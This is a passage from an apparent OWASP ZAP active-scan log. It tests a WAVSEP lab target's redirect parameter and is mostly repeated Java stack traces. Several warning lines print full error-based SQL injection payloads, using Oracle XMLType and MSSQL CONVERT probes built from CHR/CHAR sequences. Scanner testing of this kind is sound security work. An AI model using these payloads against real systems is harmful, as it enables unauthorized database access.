org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681655 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND 2245=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2245=2245) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (3680=3680] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND 2245=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2245=2245) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (3680=3680 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681655 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8447=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8447=8447) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8447=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8447=8447) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681657 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9813=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9813=9813) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- Past] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9813=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9813=9813) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- Past at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681657 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 7206=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7206=7206) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 7206=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7206=7206) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681658 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND 1659=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1659=1659) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('CgtX'='CgtX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND 1659=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1659=1659) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('CgtX'='CgtX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681658 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7164=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7164=7164) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (1691=1691] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 7164=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7164=7164) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (1691=1691 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681660 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6956=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6956=6956) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6956=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6956=6956) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681660 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND 9079=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9079=9079) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'jIik'='jIik] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND 9079=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9079=9079) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'jIik'='jIik at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681661 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6392=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6392=6392) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('GCyA'='GCyA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6392=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6392=6392) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('GCyA'='GCyA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681662 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND 7672=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7672=7672) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND 7672=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7672=7672) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681663 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 8878=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8878=8878) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'WhbU'='WhbU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 8878=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8878=8878) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'WhbU'='WhbU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 